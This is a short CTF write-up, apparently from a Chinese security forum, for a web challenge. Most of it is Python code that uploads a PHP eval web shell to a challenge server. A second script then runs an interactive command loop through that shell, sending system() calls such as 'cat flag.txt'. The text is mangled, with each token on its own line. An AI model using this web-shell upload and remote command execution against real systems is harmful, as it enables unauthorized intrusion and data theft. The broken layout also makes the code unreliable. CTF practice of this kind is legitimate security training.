不会php,不会web题
上网查的,现学现卖,东抄抄西抄抄就有下面的脚本了
https://www.cnblogs.com/tr1ple/p/11301743.html
然后改吧改吧就是下面的这种
import
json
url
=
"http://47.102.223.17:2333/index.php"
data1
{
"a"
:
"<?php eval(@$_POST['a']); ?>"
}
data2
json.dumps(data1)
data
files
[(
'file'
,(
'over.php'
,data))]
print
requests.post(url
url,files
files).content
貌似网上的菜刀不好用,自己瞎写个脚本
# -*- coding=utf-8 -*-
string
requests
'http://47.102.223.17:2333/upload/2086490076.php'
#username=admin&password=admin
def
post(mys,data):
#data={"username":"admin","password":"123456"}
res
mys.post(url, data
data).content
return
exp():
mys
requests.session()
"echo system(\"ls -l\");echo system(\"cat flag.txt\");"
while
1
cmd
raw_input
(
'$:'
)
"echo system(\""
+
"\");"
ret
post(mys,data)
get
ret.decode(
'gbk'
,
"ignore"
#print ret
if
__name__
"__main__"
exp()
全靠ccfer带躺
[注意]看雪招聘,专注安全领域的专业人才平台!